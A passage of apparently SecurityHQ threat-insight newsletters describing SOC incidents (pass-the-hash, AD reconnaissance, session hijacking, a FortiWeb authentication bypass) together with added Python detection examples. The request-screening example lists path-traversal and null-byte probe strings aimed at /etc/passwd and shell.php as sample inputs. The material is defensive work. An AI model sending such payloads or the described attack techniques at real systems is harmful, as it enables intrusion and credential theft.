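Added example, not SecurityHQ's rule logic. The events are constructed,
reduced to the EventData fields the rules need; the thresholds and
windows are assumptions to tune against your own baseline.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"    # RC4 tickets are the classic roasting indicator (AES ones can be roasted too, far more slowly)
PREAUTH_NONE = "0"   # 4768 PreAuthType 0 = pre-authentication not required (AS-REP roastable)


def ev(event_id, ts, **data):
    return {"event_id": event_id, "ts": datetime.fromisoformat(ts), **data}


# Constructed sample telemetry, not a real capture.
EVENTS = [
    # AS-REP roast: TGT request for an account with pre-auth disabled, RC4 etype, from a workstation
    ev(4768, "2025-12-02T10:00:01", account="svc_legacy", client_ip="10.1.1.50", etype="0x17", preauth="0"),
    # Ordinary AES TGT request
    ev(4768, "2025-12-02T10:00:02", account="alice", client_ip="10.1.1.20", etype="0x12", preauth="2"),
    # Kerberoast: one user requests RC4 service tickets for six SPNs within seconds
    *[ev(4769, f"2025-12-02T10:01:{i:02d}", account="bob", client_ip="10.1.1.50", etype="0x17",
         spn=f"MSSQLSvc/db{i}.corp.local:1433") for i in range(6)],
    # Ordinary service ticket request
    ev(4769, "2025-12-02T10:02:00", account="alice", client_ip="10.1.1.20", etype="0x12", spn="cifs/fs01.corp.local"),
    # Password spray: one source, twelve distinct accounts, a single failure each (stays under lockout)
    *[ev(4625, f"2025-12-02T10:05:{i:02d}", account=f"user{i}", client_ip="10.1.1.50") for i in range(12)],
    # A lone failure from another host: a typo, not a spray
    ev(4625, "2025-12-02T10:06:00", account="carol", client_ip="10.1.1.77"),
]


def asrep_roasting(events):
    """4768 with no pre-auth and an RC4 ticket: the AS-REP can be cracked offline."""
    return [e for e in events
            if e["event_id"] == 4768 and e.get("preauth") == PREAUTH_NONE and e.get("etype") == RC4_HMAC]


def _distinct_in_window(events, group_key, distinct_key, window, threshold):
    """Group by `group_key`; flag groups where some window of `window` length
    holds at least `threshold` distinct values of `distinct_key`."""
    groups = defaultdict(list)
    for e in events:
        groups[e[group_key]].append(e)
    hits = {}
    for key, evs in groups.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            distinct = {e[distinct_key] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            if len(distinct) >= threshold:
                hits[key] = len(distinct)
                break
    return hits


def kerberoasting(events, window=timedelta(minutes=5), threshold=5):
    """Many RC4 service-ticket requests for distinct SPNs by one account."""
    rc4_tgs = [e for e in events if e["event_id"] == 4769 and e.get("etype") == RC4_HMAC]
    return _distinct_in_window(rc4_tgs, "account", "spn", window, threshold)


def password_spray(events, window=timedelta(minutes=30), threshold=10):
    """Many distinct accounts failing from one source: low-and-slow spray."""
    failures = [e for e in events if e["event_id"] == 4625]
    return _distinct_in_window(failures, "client_ip", "account", window, threshold)


def correlate_sources(events):
    """Sources that appear in more than one detection: the attack narrative."""
    seen = defaultdict(set)
    for e in asrep_roasting(events):
        seen[e["client_ip"]].add("asrep_roasting")
    roasters = kerberoasting(events)
    for e in events:
        if e["event_id"] == 4769 and e["account"] in roasters:
            seen[e["client_ip"]].add("kerberoasting")
    for ip in password_spray(events):
        seen[ip].add("password_spray")
    return {ip: sorted(tags) for ip, tags in seen.items() if len(tags) > 1}


if __name__ == "__main__":
    print("AS-REP roastable requests:", [e["account"] for e in asrep_roasting(EVENTS)])
    print("Kerberoasting:", kerberoasting(EVENTS))
    print("Password spray:", password_spray(EVENTS))
    print("Correlated sources:", correlate_sources(EVENTS))
```

On the sample, 10.1.1.50 trips all three detections while alice's AES requests and carol's single typo do not. Two tuning caveats: scanners and monitoring service accounts legitimately request many service tickets, so an exclusion list is needed for the Kerberoasting rule; and because modern Kerberoasting can request AES tickets, the RC4 filter should be treated as a strong signal rather than a precondition.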


Threat Management

SecurityHQ's Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. The following section highlights some key security insights.

Alert: Multiple Suspicious Script and Reconnaissance Activities Detected (INC #1460383)

Detection: An incident was detected using Microsoft Defender for Endpoint (MDE) alerts and telemetry on December 8th, 2025, indicating multiple suspicious activities. The alert covered abnormal script execution, potential persistence mechanisms, defense evasion techniques and domain reconnaissance activity originating from a single internal endpoint. The activity was classified as suspicious because of the combination of tools and techniques commonly associated with malicious actor behavior.

Investigation: On December 8th, 2025, Microsoft Defender for Endpoint detected a sequence of suspicious actions initiated from a remote interactive session originating from an internal source IP. The activity involved the use of built-in Windows utilities and scripting engines that are commonly abused by threat actors. Notably, the NLTest utility was executed with the /domain_trusts parameter to enumerate domain trust relationships, a behavior indicative of Active Directory reconnaissance and often observed during ransomware operations or lateral movement preparation.

Shortly thereafter, additional suspicious behavior was identified, including the abuse of Rundll32 to execute JavaScript, a known living-off-the-land technique used to evade security controls, and wscript execution modifying registry keys related to proxy configuration, which could enable interception or redirection of web traffic. PowerShell was also observed as part of the activity chain, with the associated file hash reviewed through threat intelligence sources. The combination of script-based execution, system enumeration, and potential proxy manipulation strongly suggests intentional reconnaissance and defense evasion, rather than legitimate administrative activity.

Response Action taken:

  • SOC raised a Major Inc-ident and informed the customer by phone.
  • The Threat Management Team blocked the identified IOCs and updated the incident.
  • The malicious process was blocked and terminated by Microsoft Defender.
  • No further suspicious activity has been observed. A full antivirus scan was performed on the host to ensure no residual malware components remain active.

Alert: MDE: Pass the Hash followed by brute force was detected on Windows server. (INC #1471047)

Detection: An incident was detected using Microsoft Defender for Endpoint (MDE) alerts and telemetry on December 16th, 2025, indicating suspicious lateral movement activity and remote command execution on a device. The alert identified 'SuspRemoteCmdCommand' malware associated with WMI process execution originating from an external IP address.

Investigation: On December 16th, 2025, security monitoring identified a successful network logon (Event ID 4624) using an anonymous authentication context over NTLM, originating from an internal source IP and targeting domain controller infrastructure. The authentication leveraged NTLM V1 with a key length of zero via the NtLmSsp logon process, which is highly anomalous and consistent with Pass-the-Hash–style activity. During the same timeframe, multiple indicators of credential abuse were observed, including failed NTLM authentication attempts for privileged accounts, enumeration of a large number of user accounts consistent with a dictionary-style attack, and repeated access attempts to administrative and IPC shares. Additional LDAP query activity against directory services further suggested reconnaissance behavior focused on domain discovery.

Subsequent investigation revealed a broader pattern of post-authentication activity, including the creation of new processes associated with agent-style executables, the addition of multiple network share objects, and repeated access to SYSVOL, NETLOGON, and IPC$ shares from the same source. Follow-on actions included the creation and password reset of new computer accounts within the domain, successful network logons tied to the same source IP, and directory read access across multiple domain controller shares, all indicative of lateral movement and persistence preparation. In parallel, sensitive recovery material was accessed via directory and cloud interfaces, increasing the overall risk severity. Taken together, the activity strongly aligns with credential misuse, lateral movement, and domain-level reconnaissance, rather than legitimate administrative operations.

Response Action taken:

  • SOC raised a Major Incident and informed the customer by phone.
  • The Threat Management Team blocked the identified IOCs and updated the incident.
  • Running malicious processes were terminated and residues cleared by the Threat Management analyst.
  • No further suspicious activity has been observed. A full antivirus scan was performed on the host to ensure no residual malware components remain active.

Threat Hunting

SecurityHQ's Threat Hunting team conducted hunts focused on general email activity seen in customer environments. The following section highlights some of the key findings and recommendations that were communicated to affected customers.

Context: Suspicious and abnormal email communication patterns were observed across the organizations, indicating a potential risk of data exfiltration, unauthorized information disclosure, or insider misuse. These behaviors include frequent communication with competitor domains, outbound emails sent outside business hours, attachments sent to free or personal email services, and anomalous email activity linked to departing employee accounts.

The objective of these hypotheses was to proactively detect, investigate, and respond to email-based data leakage risks, ensuring sensitive business information is not transferred outside the enterprise without authorization and strengthening the overall email security posture.

Notable Observations: Across the environment, the threat hunt identified multiple high-risk email behaviors. Key findings are summarized below: 

Extensive Communication with Competitor Domains

A significant volume of email communication was observed between internal users and competitor domains. A few organisations with a mature security program proactively shared their list of competitor domains.

Key Observations:

  • On average, 1 to 2 percent of all emails involved competitor domains.
  • The most frequently contacted domains belonged to the organisation's key competitors.
  • A small subset of users communicated repeatedly and at high frequency. Subject lines referenced agreements, contracts, approvals, financial statements, tax and legal matters, increasing data sensitivity concerns.

Associated Risk: These patterns may indicate unauthorized sharing of confidential business information, competitive-intelligence leakage or misuse of corporate email channels. They highlight the importance of adding competitor domains to a watchlist to detect unapproved or intentional data leakage.

Out-of-Business Hours External Email Activity

Outbound emails sent between 7 PM and 7 AM showed elevated volumes toward external recipients.

Key Observations:

  • Multiple users sent hundreds of emails to external recipients during non-business hours.
  • Several emails were linked to payment-related or financial subjects.
  • Activity occurred during low-visibility periods, reducing detection likelihood.

Associated Risks: Email activity during off-hours increases the risk of covert data exfiltration, especially when financial or sensitive business information is involved.

Email Activity from Departing / Disabled Accounts

Email activity was analyzed for users whose accounts were disabled in the last 30 days.

Key Observations:

  • No clear evidence of malicious behavior immediately prior to account disablement was observed by the SecurityHQ team.
  • From past experience, leavers typically forward documents as email attachments to their personal email accounts.

Associated Risk: Although not conclusively malicious, data leakage risk increases during employee offboarding, especially when legal or financial documents are involved.

Emails Sent to Free & Personal External Email Domains

Significant email traffic was observed toward free external email providers in organisations where these domains are not explicitly blocked.

Key Observations:

  • On average, 10 percent of all email trails involved free external domains.
  • Around 70 percent of those emails appeared to be sent to personal email accounts.
  • All flagged emails included attachments.

Associated Risk: Sending attachments to personal email accounts is a well-known insider threat and data exfiltration technique, presenting one of the highest leakage risks identified in this hunt.

External Email Auto-Forwarding Indicators

While external auto-forwarding appears largely restricted, related behaviors were still noted.

Key Observations:

  • No widespread misconfiguration allowing automatic forwarding was identified.
  • Users were observed manually forwarding emails to external accounts.
  • Lack of user awareness regarding the risks of external forwarding.

Associated Risk: Manual forwarding can bypass technical controls and enables silent, persistent data exfiltration if not properly monitored.

Hypothesis Status:

  • The threat hunt identified multiple email communication behaviors that increase the risk of data exfiltration, although no confirmed malicious breach was detected.
  • High-volume communication with competitor domains, combined with sensitive subject lines, represents a moderate to high data leakage risk.
  • Out-of-business-hours emailing and attachment sharing to free or personal domains significantly elevates insider threat exposure.
  • Departing employee accounts did not show overt malicious intent but still warrant validation due to the nature of the shared content.
  • Overall, the findings highlight control gaps, monitoring blind spots, and awareness issues that could be exploited for unauthorized data disclosure if left unaddressed.

Recommendations: Based on the observed email threat landscape, the following actions are recommended:

  • Enforce DLP policies to detect and block sensitive financial, legal, and confidential content in outbound emails.
  • Block or quarantine attachments sent to free and personal external email domains.
  • Enable automatic encryption and mandatory classification for sensitive outbound email attachments.
  • Monitor and alert on outbound emails sent to external recipients outside business hours.
  • Trigger alerts when users send an unusually high number of attachments to new external recipients.
  • Continuously monitor and review communications with competitor domains.
  • Perform enhanced email activity reviews for users during employee offboarding periods.
  • Restrict external email capabilities for departing users where business-justified.
  • Educate users on risks associated with forwarding corporate emails to personal accounts.
  • Periodically audit external email forwarding behaviors and policy exceptions.
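The five hypotheses of the hunt above (competitor domains, out-of-hours external mail, attachments to free mail providers, departing users and sensitive subject lines) can be run as one pass over message-trace records. The following is an added worked example, not SecurityHQ's hunt queries: the records, the competitor and free-mail domain lists, the 07:00 to 19:00 business-hours window, the recently disabled account list and the sensitive-subject terms are all constructed assumptions, and it produces the per-message flags plus the kind of roll-up shown in the "Key Observations" blocks.

```python
"""Email data-leakage hunt over message-trace style records: competitor
domains, out-of-hours external mail, attachments to free mail providers,
departing users and sensitive subjects.

Added example, not SecurityHQ's hunt queries. The records, domain lists,
business-hours window and disabled-account list are constructed.
"""
from collections import Counter
from datetime import datetime

INTERNAL_DOMAIN = "example.com"
COMPETITOR_DOMAINS = {"rival-corp.example"}
FREE_MAIL_DOMAINS = {"gmail.com", "outlook.com", "yahoo.com"}
BUSINESS_HOURS = (7, 19)                       # 07:00-19:00 local, the window used in the hunt
RECENTLY_DISABLED = {"leaver@example.com"}     # accounts disabled in the last 30 days (assumed)
SENSITIVE_TERMS = ("agreement", "contract", "invoice", "payment", "tax", "financial")


def msg(ts, sender, recipient, subject, attachment):
    return {"ts": datetime.fromisoformat(ts), "sender": sender,
            "recipient": recipient, "subject": subject, "attachment": attachment}


# Constructed sample message trace, not real mail data.
MESSAGES = [
    msg("2025-12-03T10:15:00", "alice@example.com", "bob@example.com", "Lunch", False),
    msg("2025-12-03T11:00:00", "alice@example.com", "partner@rival-corp.example", "Master services agreement", True),
    msg("2025-12-03T22:40:00", "dave@example.com", "dave.home@gmail.com", "payment schedule Q4", True),
    msg("2025-12-03T23:10:00", "dave@example.com", "dave.home@gmail.com", "FW: invoices", True),
    msg("2025-12-04T09:00:00", "leaver@example.com", "me@yahoo.com", "my files", True),
    msg("2025-12-04T14:00:00", "erin@example.com", "support@vendor.example", "Ticket 42", False),
]


def domain(address):
    return address.rsplit("@", 1)[-1].lower()


def flags_for(m):
    """Risk flags for one message; internal mail is out of scope."""
    recipient_domain = domain(m["recipient"])
    if recipient_domain == INTERNAL_DOMAIN:
        return []
    flags = []
    if recipient_domain in COMPETITOR_DOMAINS:
        flags.append("competitor_domain")
    if recipient_domain in FREE_MAIL_DOMAINS and m["attachment"]:
        flags.append("attachment_to_free_mail")
    if not BUSINESS_HOURS[0] <= m["ts"].hour < BUSINESS_HOURS[1]:
        flags.append("out_of_hours")
    if m["sender"] in RECENTLY_DISABLED:
        flags.append("departing_user")
    if any(term in m["subject"].lower() for term in SENSITIVE_TERMS):
        flags.append("sensitive_subject")
    return flags


def hunt(messages):
    """Every flagged message with its reasons, in trace order."""
    return [{"sender": m["sender"], "recipient": m["recipient"], "flags": flags_for(m)}
            for m in messages if flags_for(m)]


def summarize(messages):
    """Roll-up in the shape of the hunt's 'Key Observations'."""
    external = [m for m in messages if domain(m["recipient"]) != INTERNAL_DOMAIN]
    flag_counts = Counter(flag for m in messages for flag in flags_for(m))
    by_sender = Counter(m["sender"] for m in messages if flags_for(m))
    free_mail = [m for m in external if domain(m["recipient"]) in FREE_MAIL_DOMAINS]
    return {
        "external_total": len(external),
        "free_mail_share_pct": round(100 * len(free_mail) / len(external), 1) if external else 0.0,
        "flag_counts": dict(flag_counts),
        "top_senders": by_sender.most_common(3),
    }


if __name__ == "__main__":
    for finding in hunt(MESSAGES):
        print(finding)
    print(summarize(MESSAGES))
```

Messages that stack several flags (here dave's late-night attachments to a Gmail address with payment-related subjects) are the ones worth a human look first; a single flag such as a vendor ticket outside hours is usually noise. The same flag functions can be wired into a DLP or transport rule so that the block-or-quarantine recommendations above act on the combination rather than on any one signal.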

Incident Response Success Story

Incident Story: X (formerly Twitter) Account Compromise Linked to a Corporate Domain

SecurityHQ’s Incident Response (IR) team was engaged following a suspected account takeover involving Apple IDs, social media accounts, and mobile devices. The attack leveraged leaked personal data, phishing, and session hijacking techniques to bypass MFA and gain persistent access.

The incident began when an attacker obtained leaked personal data from an external breach. Using this information, the attacker crafted a highly targeted phishing email impersonating Apple security communications.

The phishing email prompted the victim to consent to Apple account access, unknowingly authorizing a malicious OAuth session. This allowed the attacker to bypass MFA via session hijacking.

With valid session access, the attacker logged in using the leaked credentials and began account persistence actions:

  • The recovery email was changed on the X (Twitter) account.
  • The mobile number was updated on Telegram.
  • Old tweets were deleted.

Investigation revealed that a single session ID was used from multiple geographically disparate locations at the same time. This anomaly is definitive evidence of session hijacking: the attacker stole the valid session token and replayed it from remote infrastructure, bypassing multi-factor authentication (MFA).

The user’s personal Apple ID appeared in multiple breach datasets, and both personal and corporate accounts were active on the same device. This strongly supports a session hijacking pathway originating from the compromised personal account, enabling access to the corporate session without requiring the corporate password.

No direct evidence of corporate credential leakage was found on the dark web, and no further lateral movement was identified.

The SecurityHQ Incident Response team shared tactical and strategic recommendations to prevent recurrence of similar incidents.
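The anomaly that settled this case, one session ID active from locations too far apart for the elapsed time, is easy to test for once session events carry a resolved geolocation. The following is an added worked example, not the IR team's tooling: it groups constructed session records by session ID, computes the great-circle distance between consecutive uses from different IPs, and flags any pair whose implied speed exceeds a plausible-travel threshold (900 km/h is an assumption; a smaller value catches more, at the cost of flagging VPN switches).

```python
"""Flag a session token replayed from geographically disparate locations.

Added example, not SecurityHQ's IR tooling. Session records with resolved
geolocation are constructed; the speed threshold is an assumption.
"""
from collections import defaultdict
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

MAX_PLAUSIBLE_KMH = 900.0   # faster than this between two uses of one session = token replay
EARTH_RADIUS_KM = 6371.0


def event(session_id, ts, ip, city, lat, lon):
    return {"session": session_id, "ts": datetime.fromisoformat(ts),
            "ip": ip, "city": city, "lat": lat, "lon": lon}


# Constructed sample, not real telemetry.
EVENTS = [
    event("sess-A", "2025-12-05T08:00:00", "203.0.113.10", "London", 51.51, -0.13),
    event("sess-A", "2025-12-05T08:03:00", "198.51.100.7", "Singapore", 1.35, 103.82),
    event("sess-A", "2025-12-05T08:05:00", "203.0.113.10", "London", 51.51, -0.13),
    event("sess-B", "2025-12-05T09:00:00", "192.0.2.44", "Manchester", 53.48, -2.24),
    event("sess-B", "2025-12-05T12:00:00", "192.0.2.45", "London", 51.51, -0.13),
]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two WGS84 points."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def hijacked_sessions(events, max_kmh=MAX_PLAUSIBLE_KMH):
    """Sessions with consecutive uses from different IPs that imply impossible travel."""
    by_session = defaultdict(list)
    for e in events:
        by_session[e["session"]].append(e)
    findings = {}
    for sid, evs in by_session.items():
        evs.sort(key=lambda e: e["ts"])
        for prev, cur in zip(evs, evs[1:]):
            if prev["ip"] == cur["ip"]:
                continue
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            # clamp to one second so same-second events do not divide by zero
            hours = max((cur["ts"] - prev["ts"]).total_seconds() / 3600, 1 / 3600)
            speed = km / hours
            if speed > max_kmh:
                findings.setdefault(sid, []).append(
                    {"from": prev["city"], "to": cur["city"], "km": round(km), "kmh": round(speed)})
    return findings


if __name__ == "__main__":
    for sid, hops in hijacked_sessions(EVENTS).items():
        print(sid, hops)
```

sess-A is flagged twice (London to Singapore and back within five minutes), while sess-B's Manchester-to-London hop over three hours is ordinary travel. The check is only as good as the geolocation feed; when a user is known to sit behind a cloud VPN, the exit node's location should be substituted before the distance is computed.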


The post Managed Defense Threat Insights: December 2025 Newsletter appeared first on SecurityHQ.

Managed Defense Threat Insights: November 2025 Newsletter
https://www.securityhq.com/blog/managed-defense-threat-insights-november-2025-newsletter/
Wed, 10 Dec 2025 10:20:06 +0000
https://www.securityhq.com/?p=13378
Cyber Defense Center

Threat Actor Successfully Probes PHP RCE Payloads Against a Website Protected by AWS WAF and ALB

Detection: An incident-driven security assessment detected PHP RCE probing attempts against a non-PHP Nginx web server, disclosing and mitigating a critical gap that allowed the probes to bypass the defense layers.

Description: While reviewing the client's security posture, SecurityHQ's Incident Response team identified malicious traffic attempting to exploit a PHP Remote Code Execution (RCE) vulnerability against a web application hosted on Nginx, which does not run any PHP components. The attacker's objective appeared to be reconnaissance, specifically probing server behavior and response codes. Because the affected web server was not yet integrated with the SIEM, the initial 404 responses generated by Nginx were not visible to the monitoring team. A deeper investigation, combined with consultation with the application team, revealed that these 404 responses originated from the web tier behind the AWS WAF and Application Load Balancer (ALB), meaning the probes had passed both edge layers.

Recommendations: To strengthen the overall security posture and reduce unnecessary traffic reaching the application backend, we recommended enabling all default AWS Managed Rule Groups within AWS WAF. These rule sets help block common exploit attempts—including PHP-based probes—at the edge, preventing them from being forwarded to the ALB and ultimately to the webserver. This proactive hardening step aligns with AWS best practices and significantly minimizes exposure to widespread vulnerability scanners and exploit attempts. 

Critical Vulnerability in Fortinet FortiWeb Exploited in the Wild

Detection: Critical FortiWeb Zero-Day Alert: Path Traversal Exploit Enables Remote Authentication Bypass

SHQ Detection Pack – Relevant Use Cases

  1. Suspicious Web Requests Identified in Audit, System Logs
  2. Administrative Logins to the management interface
  3. Configuration Changes Executed

Description: SecurityHQ's Incident Response team successfully responded to an incident involving CVE-2025-64446, a critical vulnerability impacting Fortinet's FortiWeb Web Application Firewall. The issue combines a relative path traversal flaw with an authentication bypass, allowing remote, unauthenticated attackers to access internal management endpoints. According to the vendor, multiple FortiWeb versions are affected, including 7.0.0–7.0.11, 7.2.0–7.2.11, 7.4.0–7.4.9, 7.6.0–7.6.4 and 8.0.0–8.0.1, as confirmed by FortiGuard Labs and CISA. Exploitation requires no valid credentials: attackers can send crafted HTTP(S) requests that leverage the path traversal weakness to reach protected CGI components on the management interface. Successful exploitation enables complete authentication bypass, allowing threat actors to create new administrative accounts and gain full control of the FortiWeb device. This poses a significant risk to environments relying on FortiWeb as a frontline security control.

Mitigation Actioned:

  • Restricted management access to trusted internal networks only.
  • Keys, credentials and certificates were rotated.

Lessons Learnt: Organizations should have a strong proactive patching regime, restrict management access to internal networks, and enable key WAF protections to block exploitation attempts. Post-patch, review admin accounts and logs for unauthorized activity and ensure full SIEM visibility for ongoing monitoring.
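Both cases above come down to requests that should have been dropped at the edge: PHP probes against an application that serves no PHP, and path traversal aimed at management endpoints. The following is an added worked example of that screening logic, not AWS WAF managed-rule logic and not SecurityHQ code: it fully URL-decodes each request path (so double-encoded `%252e%252e%252f` is caught), normalises backslashes, and reports PHP probes, traversal segments and null-byte truncation tricks. The request paths are constructed, and the list of extensions the application never serves is an assumption to set per application.

```python
"""Screen request paths the way an edge rule set would: PHP probes against
an application that serves no PHP, and path traversal hidden by URL
encoding (including double encoding).

Added example, not AWS WAF managed-rule logic and not SecurityHQ code.
The request paths are constructed.
"""
import posixpath
from urllib.parse import unquote

PROBE_EXTENSIONS = {".php", ".phtml", ".php7", ".phar"}   # file types a non-PHP app never serves (assumed)


def fully_decode(path, rounds=3):
    """Decode repeatedly so %252e%252e%252f (double encoding) is caught."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(raw_path):
    """Reasons to block the request; an empty list means it looks clean."""
    reasons = []
    decoded = fully_decode(raw_path).replace("\\", "/")
    path_only = decoded.split("?", 1)[0]
    effective = path_only.split("\x00", 1)[0]    # what a null-byte-truncating backend would see
    if posixpath.splitext(effective)[1].lower() in PROBE_EXTENSIONS:
        reasons.append("php_probe_on_non_php_host")
    if ".." in path_only.split("/"):
        reasons.append("path_traversal")
    if "\x00" in decoded:
        reasons.append("null_byte")
    return reasons


# Constructed sample requests, not a real capture.
SAMPLE_REQUESTS = [
    "/index.html",
    "/assets/logo.png?v=2",
    "/wp-login.php",
    "/static/%2e%2e/%2e%2e/etc/passwd",
    "/static/%252e%252e%252f%252e%252e%252fetc/passwd",
    "/app/..%5c..%5cwindows/win.ini",
    "/x/..%2f..%2fshell.php%00.png",
]


def screen(requests):
    """Map each request to its block reasons and list what would reach the backend."""
    verdicts = {r: classify(r) for r in requests}
    passed = [r for r, v in verdicts.items() if not v]
    return verdicts, passed


if __name__ == "__main__":
    verdicts, passed = screen(SAMPLE_REQUESTS)
    for request, reasons in verdicts.items():
        print(f"{request!r}: {reasons or 'clean'}")
    print("reaching backend:", passed)
```

Only the two static-asset requests reach the backend. The reason to decode more than once is visible in the fifth sample: a single decode leaves `%2e%2e%2f` in place, which a naive `..` check misses while the web server happily decodes it again. Whatever screens requests at the edge, the backend's own 4xx responses still need to flow to the SIEM; in the Nginx case above it was precisely those 404s that revealed the probes had got through.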

Threat Detection Engineering

Key Detection Engineering Highlights for November

AzureHound Probes

Threat actors widely use AzureHound or similar tools to map users, groups and roles within Microsoft 365 or Entra ID as part of early enumeration; red teamers use the same tooling to identify gaps in cloud security. A short example of this attack method: a low-privilege account suddenly produces a burst of sign-ins from an unusual application pattern.

The tool rapidly queries directory information, attempting to identify privileged roles, access paths, and high-value accounts.

Why it matters: This type of reconnaissance helps attackers understand your cloud environment, find weak points, and plan privilege escalation. Detecting these early signals reduces the chance of further compromise.

Rule Name: AzureHound User Agent Detected (P2)

Detection Scope: Microsoft 365 and Entra ID

Rationale: Reconnaissance tools generate directory queries and sign-in patterns that differ from normal user activity. Identifying these anomalies allows early detection before attackers escalate privileges or move deeper into the environment.

BloodHound – Behavioral Detection:

An attacker runs a BloodHound/SharpHound collector from a compromised workstation to rapidly enumerate Active Directory. BloodHound enumeration creates rapid, large-scale directory queries that differ from normal user or admin behavior. Tracking abnormal spikes in object-access events helps identify reconnaissance before privilege escalation or lateral movement occurs.

Here is a short example of this Attack method: Host XYZ generated 2,400 “Failure Audit: An operation was performed on an object” events in 45 seconds, each referencing different AD objects (users/groups/ACLs). The source account was a low-privilege user (not a well-known service account) and the requests targeted many high-value OUs.

Why it matters: BloodHound-style enumeration reveals relationships, privileges, and ACEs that attackers use to plan lateral movement and privilege escalation.

Rule Name: Excessive Directory Access Failures Detected (P3)

Detection Scope: Monitor Windows Security audit logs for spikes in object-access events (success & failure) indicating mass AD enumeration; surface SourceHost, Username, and TargetObject; exclude known service/ admin accounts.
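The rule described above, a spike in object-access events from one host and account, is a sliding-window count of distinct objects. The following is an added worked example, not SecurityHQ's production rule: it builds constructed Event ID 4662 telemetry that mirrors the scenario in the text (a low-privilege user touching 2,400 objects in about 45 seconds from one workstation), applies the exclusion for known service accounts, and surfaces the source host, user, distinct-object count, failure count and any high-value objects hit. The 60-second window, the 500-object threshold and the exclusion list are assumptions.

```python
"""Burst detection for mass Active Directory enumeration (Event ID 4662,
"An operation was performed on an object"), as in the BloodHound scenario.

Added example, not SecurityHQ's production rule. Events are constructed;
the window, threshold and service-account exclusions are assumptions.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

EXCLUDED_ACCOUNTS = {"CORP\\svc_backup", "CORP\\svc_scanner"}   # known noisy service accounts (assumed)
HIGH_VALUE_PREFIXES = ("CN=Domain Admins", "CN=Enterprise Admins", "OU=Domain Controllers")
DA_DN = "CN=Domain Admins,CN=Users,DC=corp,DC=local"


def ev(ts, host, account, obj, outcome):
    return {"ts": ts, "host": host, "account": account, "object": obj, "outcome": outcome}


def make_events():
    """Constructed telemetry: one collector burst, one noisy service account, one admin."""
    t0 = datetime(2025, 11, 12, 9, 0, 0)
    events = []
    for i in range(2400):   # ~43 s of SharpHound-like object touches from a workstation
        obj = DA_DN if i % 400 == 0 else f"CN=user{i},OU=Staff,DC=corp,DC=local"
        events.append(ev(t0 + timedelta(milliseconds=18 * i), "WS042", "CORP\\jdoe", obj, "Failure"))
    for i in range(2400):   # backup job touching as many objects: removed by the exclusion list
        events.append(ev(t0 + timedelta(milliseconds=18 * i), "BKP01", "CORP\\svc_backup",
                         f"CN=user{i},OU=Staff,DC=corp,DC=local", "Success"))
    for i in range(5):      # admin doing routine work over several minutes
        events.append(ev(t0 + timedelta(minutes=i), "ADM01", "CORP\\admin.bob",
                         f"CN=user{i},OU=Staff,DC=corp,DC=local", "Success"))
    return events


def detect_enumeration_bursts(events, window=timedelta(seconds=60), threshold=500, excluded=EXCLUDED_ACCOUNTS):
    """Per (host, account): the largest number of distinct objects touched inside one window."""
    groups = defaultdict(list)
    for e in events:
        if e["account"] not in excluded:
            groups[(e["host"], e["account"])].append(e)
    alerts = []
    for (host, account), evs in groups.items():
        evs.sort(key=lambda e: e["ts"])
        in_window, left, best, span = Counter(), 0, 0, (evs[0]["ts"], evs[0]["ts"])
        for e in evs:
            in_window[e["object"]] += 1
            while e["ts"] - evs[left]["ts"] > window:   # slide the left edge of the window
                old = evs[left]["object"]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            if len(in_window) > best:
                best, span = len(in_window), (evs[left]["ts"], e["ts"])
        if best >= threshold:
            objects = {e["object"] for e in evs}
            alerts.append({
                "host": host, "account": account, "distinct_objects": best,
                "seconds": round((span[1] - span[0]).total_seconds(), 1),
                "failures": sum(1 for e in evs if e["outcome"] == "Failure"),
                "high_value_hits": sorted(o for o in objects if o.startswith(HIGH_VALUE_PREFIXES)),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_enumeration_bursts(make_events()):
        print(alert)
```

Only WS042 / CORP\jdoe is raised: the backup server generates the same volume but is excluded, and the admin touches five objects in five minutes. Counting distinct objects rather than raw events is what separates a collector from a chatty application that hammers one object; the failure count is kept separately because an enumeration run by a low-privilege account tends to produce mostly failure audits, which is the "Failure Audit" signature quoted above.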

Threat Management

SecurityHQ's Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. The following section highlights some key security insights.

Account Takeover! Sign-In Activity from Malicious User Agent "axios/1.13.1"

Detection: The incident trigger was a suspicious user authentication activity with unfamiliar sign-in properties and a detected password spray attack. The alert identified potential unauthorized access attempts originating from an unusual IP address and nonstandard client application.

Investigation: Identity Protection detected an unusual interactive sign-in for the user account from an external IP address located in the USA. The authentication was performed using the atypical user agent "axios/1.13.1", an HTTP client library used for automated requests rather than legitimate browser-based logins.

Multiple aspects of the authentication, including ASN, browser type, device fingerprint, geographic location and tenant IP subnet, were inconsistent with the user's typical login patterns from their usual location and device, making the activity highly anomalous. Although MFA was successfully completed via text message to the registered number, the abnormal client and unfamiliar sign-in characteristics raised concerns regarding potential credential compromise or account takeover.

Subsequent activity from the account included a suspicious URL click leading to a OneDrive resource. Sandbox analysis confirmed the link redirected to a OneDrive login page, indicative of phishing intent. The URL originated from "cable[.]coromans[.]com", a domain active since 2010 but potentially abused for malicious purposes. Additionally, a concurrent password spray detection targeting multiple accounts suggested broader credential-guessing attempts in the environment. Based on these findings, the activity aligns with MITRE ATT&CK T1110 (Brute Force) under TA0006 – Credential Access, consistent with threat actors attempting unauthorized entry via automated or scripted authentication attempts.

Actions taken: A Major Incident was raised and the customer was notified by phone. Immediate remediation steps were applied to the user's account, and the identified IOCs were blocked by the SecurityHQ team under the Managed EDR service.

Reference: https://www.securityhq.com/blog/adaptive-defense-how-cloud-app-policies-can-block-malicious-user-agents/

Throughout 2025, the SecurityHQ team raised 300+ Major Incidents originating from this axios user agent and prevented further damage in every case.
